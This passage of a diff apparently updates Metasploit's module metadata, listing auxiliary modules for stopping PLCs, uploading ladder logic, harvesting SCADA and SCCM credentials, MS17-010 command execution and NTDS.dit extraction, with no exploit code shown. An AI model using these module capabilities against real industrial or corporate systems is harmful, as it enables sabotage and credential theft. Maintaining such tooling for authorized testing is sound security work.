+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_command",
@@ -10176,19 +10302,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/modicon_password_recovery": {
"name": "Schneider Modicon Quantum Password Recovery",
"fullname": "auxiliary/admin/scada/modicon_password_recovery",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
@@ -10196,7 +10325,7 @@
"K. Reid Wightman ",
"todb "
],
- "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.",
+ "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
@@ -10211,7 +10340,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2023-12-16 23:40:30 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_password_recovery",
@@ -10219,19 +10348,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/modicon_stux_transfer": {
"name": "Schneider Modicon Ladder Logic Upload/Download",
"fullname": "auxiliary/admin/scada/modicon_stux_transfer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
@@ -10239,21 +10371,17 @@
"K. Reid Wightman ",
"todb "
],
- "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.",
+ "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-03-10 18:03:35 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_stux_transfer",
@@ -10261,19 +10389,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/moxa_credentials_recovery": {
"name": "Moxa Device Credential Retrieval",
"fullname": "auxiliary/admin/scada/moxa_credentials_recovery",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
@@ -10281,7 +10412,7 @@
"Patrick DeSantis ",
"K. Reid Wightman "
],
- "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.",
+ "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.",
"references": [
"CVE-2016-9361",
"BID-85965",
@@ -10292,14 +10423,10 @@
"platform": "",
"arch": "",
"rport": 4800,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/moxa_credentials_recovery",
@@ -10307,19 +10434,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/multi_cip_command": {
"name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands",
"fullname": "auxiliary/admin/scada/multi_cip_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
@@ -10328,21 +10458,17 @@
"K. Reid Wightman ",
"todb "
],
- "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.",
+ "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 44818,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/multi_cip_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/multi_cip_command",
@@ -10350,19 +10476,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/mypro_mgr_creds": {
"name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)",
"fullname": "auxiliary/admin/scada/mypro_mgr_creds",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2025-02-13",
"type": "auxiliary",
@@ -10394,7 +10523,7 @@
"https"
],
"targets": null,
- "mod_time": "2025-02-20 15:40:05 +0000",
+ "mod_time": "2025-06-23 19:38:36 +0000",
"path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb",
"is_install_path": true,
"ref_name": "admin/scada/mypro_mgr_creds",
@@ -10414,37 +10543,29 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/pcom_command": {
"name": "Unitronics PCOM remote START/STOP/RESET command",
"fullname": "auxiliary/admin/scada/pcom_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luis Rosa "
],
- "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.",
+ "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.",
"references": [
"URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf"
],
"platform": "",
"arch": "",
"rport": 20256,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2021-01-29 16:19:13 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/pcom_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/pcom_command",
@@ -10452,26 +10573,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-restarts"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/phoenix_command": {
"name": "PhoenixContact PLC Remote START/STOP Command",
"fullname": "auxiliary/admin/scada/phoenix_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-05-20",
"type": "auxiliary",
"author": [
"Tijl Deneut "
],
- "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)",
+ "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)",
"references": [
"URL-https://github.com/tijldeneut/ICSSecurityScripts",
"CVE-2014-9195"
@@ -10479,14 +10603,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/phoenix_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/phoenix_command",
@@ -10494,26 +10614,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/scada/yokogawa_bkbcopyd_client": {
"name": "Yokogawa BKBCopyD.exe Client",
"fullname": "auxiliary/admin/scada/yokogawa_bkbcopyd_client",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-08-09",
"type": "auxiliary",
"author": [
"Unknown"
],
- "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.",
+ "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.",
"references": [
"CVE-2014-5208",
"URL-https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
@@ -10521,14 +10644,10 @@
"platform": "",
"arch": "",
"rport": 20111,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-03-10 10:28:25 +0000",
+ "mod_time": "2025-05-26 20:49:19 +0000",
"path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
"is_install_path": true,
"ref_name": "admin/scada/yokogawa_bkbcopyd_client",
@@ -10536,6 +10655,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -10554,19 +10680,75 @@
}
]
},
+ "auxiliary_admin/sccm/get_naa_credentials": {
+ "name": "Get NAA Credentials",
+ "fullname": "auxiliary/admin/sccm/get_naa_credentials",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": null,
+ "type": "auxiliary",
+ "author": [
+ "xpn",
+ "skelsec",
+ "smashery"
+ ],
+ "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n This requires a computer account, which can be added using the samr_account module.",
+ "references": [
+ "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/",
+ "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md",
+ "URL-https://github.com/Mayyhem/SharpSCCM",
+ "URL-https://github.com/garrettfoster13/sccmhunter"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": 389,
+ "autofilter_ports": [
+ 80,
+ 8080,
+ 443,
+ 8000,
+ 8888,
+ 8880,
+ 8008,
+ 3000,
+ 8443
+ ],
+ "autofilter_services": [
+ "http",
+ "https"
+ ],
+ "targets": null,
+ "mod_time": "2025-05-05 11:16:35 +0000",
+ "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb",
+ "is_install_path": true,
+ "ref_name": "admin/sccm/get_naa_credentials",
+ "check": false,
+ "post_auth": true,
+ "default_credential": false,
+ "notes": {
+ "Stability": [],
+ "SideEffects": [
+ "config-changes"
+ ],
+ "Reliability": []
+ },
+ "session_types": [
+ "ldap"
+ ],
+ "needs_cleanup": false,
+ "actions": []
+ },
"auxiliary_admin/serverprotect/file": {
"name": "TrendMicro ServerProtect File Access",
"fullname": "auxiliary/admin/serverprotect/file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"toto"
],
- "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.",
+ "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.",
"references": [
"CVE-2007-6507",
"OSVDB-44318",
@@ -10575,14 +10757,10 @@
"platform": "",
"arch": "",
"rport": 5168,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-05-12 22:15:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/serverprotect/file.rb",
"is_install_path": true,
"ref_name": "admin/serverprotect/file",
@@ -10590,6 +10768,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -10615,9 +10800,7 @@
"auxiliary_admin/smb/change_password": {
"name": "SMB Password Change",
"fullname": "auxiliary/admin/smb/change_password",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10640,7 +10823,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/change_password.rb",
"is_install_path": true,
"ref_name": "admin/smb/change_password",
@@ -10648,15 +10831,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Reliability": [
-
- ],
"Stability": [
-
+ "crash-safe"
],
"SideEffects": [
- "ioc-in-logs"
- ]
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": [
"smb"
@@ -10684,9 +10866,7 @@
"auxiliary_admin/smb/check_dir_file": {
"name": "SMB Scanner Check File/Directory Utility",
"fullname": "auxiliary/admin/smb/check_dir_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10695,9 +10875,7 @@
"j0hn__f"
],
"description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -10710,7 +10888,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/check_dir_file",
@@ -10718,19 +10896,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/delete_file": {
"name": "SMB File Delete Utility",
"fullname": "auxiliary/admin/smb/delete_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10738,9 +10919,7 @@
"mubix "
],
"description": "This module deletes a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -10753,7 +10932,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/delete_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/delete_file",
@@ -10761,21 +10940,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "os-resource-loss"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": [
"smb"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/download_file": {
"name": "SMB File Download Utility",
"fullname": "auxiliary/admin/smb/download_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10783,9 +10963,7 @@
"mubix "
],
"description": "This module downloads a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -10798,7 +10976,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/download_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/download_file",
@@ -10806,21 +10984,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": [
"smb"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/list_directory": {
"name": "SMB Directory Listing Utility",
"fullname": "auxiliary/admin/smb/list_directory",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10829,9 +11008,7 @@
"hdm "
],
"description": "This module lists the directory of a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -10844,7 +11021,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/list_directory.rb",
"is_install_path": true,
"ref_name": "admin/smb/list_directory",
@@ -10852,19 +11029,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/ms17_010_command": {
"name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution",
"fullname": "auxiliary/admin/smb/ms17_010_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-03-14",
"type": "auxiliary",
@@ -10874,7 +11052,7 @@
"Shadow Brokers",
"Equation Group"
],
- "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
+ "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
@@ -10896,7 +11074,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-20 13:20:44 +0000",
"path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/ms17_010_command",
@@ -10909,27 +11087,30 @@
"ETERNALROMANCE",
"ETERNALCHAMPION",
"ETERNALBLUE"
- ]
+ ],
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/psexec_ntdsgrab": {
"name": "PsExec NTDS.dit And SYSTEM Hive Download Utility",
"fullname": "auxiliary/admin/smb/psexec_ntdsgrab",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis "
],
- "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.",
+ "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.",
"references": [
"URL-http://sourceforge.net/projects/smbexec",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
@@ -10946,7 +11127,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_ntdsgrab",
@@ -10954,21 +11135,26 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": [
"smb"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/samba_symlink_traversal": {
"name": "Samba Symlink Directory Traversal",
"fullname": "auxiliary/admin/smb/samba_symlink_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -10994,7 +11180,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb",
"is_install_path": true,
"ref_name": "admin/smb/samba_symlink_traversal",
@@ -11002,19 +11188,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/upload_file": {
"name": "SMB File Upload Utility",
"fullname": "auxiliary/admin/smb/upload_file",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11022,9 +11212,7 @@
"hdm "
],
"description": "This module uploads a file to a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 445,
@@ -11037,7 +11225,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/upload_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/upload_file",
@@ -11045,28 +11233,32 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": [
"smb"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/smb/webexec_command": {
"name": "WebEx Remote Command Execution Utility",
"fullname": "auxiliary/admin/smb/webexec_command",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ron Bowes "
],
- "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.",
+ "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
@@ -11083,7 +11275,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2018-10-24 16:18:17 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/smb/webexec_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/webexec_command",
@@ -11091,19 +11283,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/sunrpc/solaris_kcms_readfile": {
"name": "Solaris KCMS + TTDB Arbitrary File Read",
"fullname": "auxiliary/admin/sunrpc/solaris_kcms_readfile",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2003-01-22",
"type": "auxiliary",
@@ -11121,34 +11316,25 @@
"platform": "",
"arch": "",
"rport": 111,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-10-05 13:50:30 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb",
"is_install_path": true,
"ref_name": "admin/sunrpc/solaris_kcms_readfile",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/teradata/teradata_odbc_sql": {
"name": "Teradata ODBC SQL Query Module",
"fullname": "auxiliary/admin/teradata/teradata_odbc_sql",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-03-29",
"type": "auxiliary",
